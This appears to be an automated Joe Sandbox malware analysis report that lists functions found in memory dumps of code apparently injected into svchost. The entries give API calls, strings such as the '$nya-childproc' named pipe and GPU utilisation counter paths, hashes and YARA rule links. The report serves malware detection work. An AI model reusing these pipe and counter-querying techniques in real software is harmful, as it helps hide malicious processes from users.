Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 23c13c2ddbe498f8b91da9e5c8de495e8af333af9e169da25c5b797211c4f684
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 3931F232A00F4897F722DF96A8587D9A3E2F788BC5F440525DE4AA3F24EF78C4568340

Function 00000195DE1A34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000195DE1A3516
GetProcessHeap.KERNEL32 ref: 00000195DE1A3527
HeapAlloc.KERNEL32 ref: 00000195DE1A3535
PdhGetCounterInfoW.PDH ref: 00000195DE1A354B
StrCmpW.SHLWAPI ref: 00000195DE1A3560

Part of subcall function 00000195DE1A3950: StrCmpNW.SHLWAPI ref: 00000195DE1A3972
Part of subcall function 00000195DE1A3950: StrStrW.SHLWAPI ref: 00000195DE1A3990
Part of subcall function 00000195DE1A3950: StrToIntW.SHLWAPI ref: 00000195DE1A39B7

GetProcessHeap.KERNEL32 ref: 00000195DE1A358D
HeapFree.KERNEL32 ref: 00000195DE1A359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 00000195DE1A3559

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 02310675b14882a9f38c52dff3f2035dc3487fd213dcf45e48caa12156e258ff
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: DB31A071B10F018AE753EFE6A8647A973E3B794F85F4440249E4A63724DE38E44AE700

Function 00000195DD5C34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000195DD5C3516
GetProcessHeap.KERNEL32 ref: 00000195DD5C3527
HeapAlloc.KERNEL32 ref: 00000195DD5C3535
PdhGetCounterInfoW.PDH ref: 00000195DD5C354B
StrCmpW.SHLWAPI ref: 00000195DD5C3560

Part of subcall function 00000195DD5C3950: StrCmpNW.SHLWAPI ref: 00000195DD5C3972
Part of subcall function 00000195DD5C3950: StrStrW.SHLWAPI ref: 00000195DD5C3990
Part of subcall function 00000195DD5C3950: StrToIntW.SHLWAPI ref: 00000195DD5C39B7

GetProcessHeap.KERNEL32 ref: 00000195DD5C358D
HeapFree.KERNEL32 ref: 00000195DD5C359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 00000195DD5C3559

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 628014668acd7ca6cad3ba2be0a6b098e9f2cde72bc6ffd802b3807a3aac84b2
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 1431B131611F498AFB12DFA6A8A479973E2FB84FD4F444125DE4AA3B24EF38D441C700

Function 00000195DE1AA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000195DE1AA289

Part of subcall function 00000195DE1AB144: __GetUnwindTryBlock.LIBCMT ref: 00000195DE1AB187
Part of subcall function 00000195DE1AB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000195DE1AB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000195DE1AA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000195DE1AA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000195DE1AA6BC

Strings

csm, xrefs: 00000195DE1AA30A
csm, xrefs: 00000195DE1AA2A3
csm, xrefs: 00000195DE1AA384

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: f333d004c4201acad5f0095d6518f9af5d46922d673cb5da6890ded6a890a167
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 17D18072704F808AEB22DBE5E4623ED77E2F755798F100115EA8D67B96CB34E48AD700

Function 00000195DD5CA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000195DD5CA289

Part of subcall function 00000195DD5CB144: __GetUnwindTryBlock.LIBCMT ref: 00000195DD5CB187
Part of subcall function 00000195DD5CB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000195DD5CB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000195DD5CA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000195DD5CA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000195DD5CA6BC

Strings

csm, xrefs: 00000195DD5CA2A3
csm, xrefs: 00000195DD5CA384
csm, xrefs: 00000195DD5CA30A

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 2a12b6d6d80294664708d48eb765894e8ab2adca944515e1870ad09071017ab3
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 81D19172605F888AEB22DFA9D4643DD7BE1F745B88F104115EE89A7F9ACB35C491CB00

Function 00000195DD59962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000195DD599689

Part of subcall function 00000195DD59A544: __GetUnwindTryBlock.LIBCMT ref: 00000195DD59A587
Part of subcall function 00000195DD59A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000195DD59A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000195DD599761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000195DD5999AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000195DD599ABC

Strings

csm, xrefs: 00000195DD599784
csm, xrefs: 00000195DD5996A3
csm, xrefs: 00000195DD59970A

Memory Dump Source

Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: f7a7ca7eb20ed7d295b5edeed0f758116d1f13679354ec40451434b200c79119
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 95D16B32604B80C6EB629FA594A03ED3BE2F756798F142115EE8967F9ADF34C481CF00

Function 00000195DE1A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000195DE1A10B1
RegEnumValueW.ADVAPI32 ref: 00000195DE1A1117
GetProcessHeap.KERNEL32 ref: 00000195DE1A115A
HeapAlloc.KERNEL32 ref: 00000195DE1A1168
GetProcessHeap.KERNEL32 ref: 00000195DE1A1185
HeapFree.KERNEL32 ref: 00000195DE1A1193

Strings

d, xrefs: 00000195DE1A10D6

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 3a42ad787abd285ee7845de4f83fd4a9e7553fd03c475afe01ceddadd12f1555
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: C6417C73314B80CAE761CFA1E4553AA77E2F388B88F448129DA8917758DF38D849CB00

Function 00000195DD5C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000195DD5C10B1
RegEnumValueW.ADVAPI32 ref: 00000195DD5C1117
GetProcessHeap.KERNEL32 ref: 00000195DD5C115A
HeapAlloc.KERNEL32 ref: 00000195DD5C1168
GetProcessHeap.KERNEL32 ref: 00000195DD5C1185
HeapFree.KERNEL32 ref: 00000195DD5C1193

Strings

d, xrefs: 00000195DD5C10D6

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: f70685bcbe597e86385b7cc7f100aad14a982d2585660afff8881df2b15e06b3
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 8D419C33214F84DAE761CFA5E45479A77E2F388B88F448129DA8A57B58DF3CC489CB40

Function 00000195DE1A2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000195DE1A252D
GetCurrentProcessId.KERNEL32 ref: 00000195DE1A2537
CreateFileW.KERNEL32 ref: 00000195DE1A2568
WriteFile.KERNEL32 ref: 00000195DE1A2590
ReadFile.KERNEL32 ref: 00000195DE1A25AF
CloseHandle.KERNEL32 ref: 00000195DE1A25B8

Strings

\\.\pipe\$nya-childproc, xrefs: 00000195DE1A2549

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 59f99d46ba9f233d167b5253210f96db0aecedac19e458b1482b534541895561
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 68114C32B14B4082E711DBA1F46439A77A2F389BD5F940315EA5952AA8DF3CD149CB40

Function 00000195DD5C2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000195DD5C252D
GetCurrentProcessId.KERNEL32 ref: 00000195DD5C2537
CreateFileW.KERNEL32 ref: 00000195DD5C2568
WriteFile.KERNEL32 ref: 00000195DD5C2590
ReadFile.KERNEL32 ref: 00000195DD5C25AF
CloseHandle.KERNEL32 ref: 00000195DD5C25B8

Strings

\\.\pipe\$nya-childproc, xrefs: 00000195DD5C2549

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 7509e7a3dccbc2dcc2c82b9c8b24b7a84b7af8d42747739c182919636066ab4f
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 7E114C32614B4082F711CB65F42879A77E2F78ABD6F944315EA5A56FA8CF7CC144CB40

Function 00000195DE1A7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000195DE1A7C78
__scrt_acquire_startup_lock.LIBCMT ref: 00000195DE1A7CCA
_RTC_Initialize.LIBCMT ref: 00000195DE1A7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000195DE1A7D1E
__scrt_release_startup_lock.LIBCMT ref: 00000195DE1A7D49

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: eb808d00c37b4e1360fe495ff00f73c3a869b6200c632dba495aef9fde573732
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4881C330700F414AFB53EBE594773F966E3AB85788F4442159A08B7396DB38EA4FA310

Function 00000195DD5C7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000195DD5C7C78
__scrt_acquire_startup_lock.LIBCMT ref: 00000195DD5C7CCA
_RTC_Initialize.LIBCMT ref: 00000195DD5C7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000195DD5C7D1E
__scrt_release_startup_lock.LIBCMT ref: 00000195DD5C7D49

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 6379b863260bfa375d13409622f3e7dcea134ea5b6f6b6f3c35f16f38f2b2821
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: A2812731602F0E86FB63ABEE94B13E967D3AB85784F4441559A09F7F96DB78C8458300

Function 00000195DD597050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000195DD597078
__scrt_acquire_startup_lock.LIBCMT ref: 00000195DD5970CA
_RTC_Initialize.LIBCMT ref: 00000195DD5970F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000195DD59711E
__scrt_release_startup_lock.LIBCMT ref: 00000195DD597149

Memory Dump Source

Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: f93e3676de474269facc38ea8db4618a25c98044c88f8969f2a019eb9f92de04
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: A181A131610F52C6FB57EBE6A8713D923D7AB86780F545127AA0877F96DB38C8468F00

Function 00000195DE1A9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9B31
GetLastError.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9B3F
LoadLibraryExW.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9B69
FreeLibrary.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9BD7
GetProcAddress.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9BE3

Strings

api-ms-, xrefs: 00000195DE1A9B51

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 373267673960247c02ce3649d81dc698787551280583566fcc952db4b036d8a1
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 7F318F31312F4095EF13DBC6A821BE923D6B795BA0F590625AD1D6B790DF38E48EA310

Function 00000195DD5C9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9B31
GetLastError.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9B3F
LoadLibraryExW.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9B69
FreeLibrary.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9BD7
GetProcAddress.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9BE3

Strings

api-ms-, xrefs: 00000195DD5C9B51

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 4e0b8799cdc66485c2794c2c79126a195ddde72e07991b3bc5329d3a1ccd5ead
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 5331E731317E48E1EF139B8A98203E523E5B756BA6F590624DD1DA7B98EF38C444C710

Function 00000195DE1B3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000195DE1B3431
GetLastError.KERNEL32 ref: 00000195DE1B343D
CloseHandle.KERNEL32 ref: 00000195DE1B3455
CreateFileW.KERNEL32 ref: 00000195DE1B3480
WriteConsoleW.KERNEL32 ref: 00000195DE1B349F

Strings

CONOUT$, xrefs: 00000195DE1B3461

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

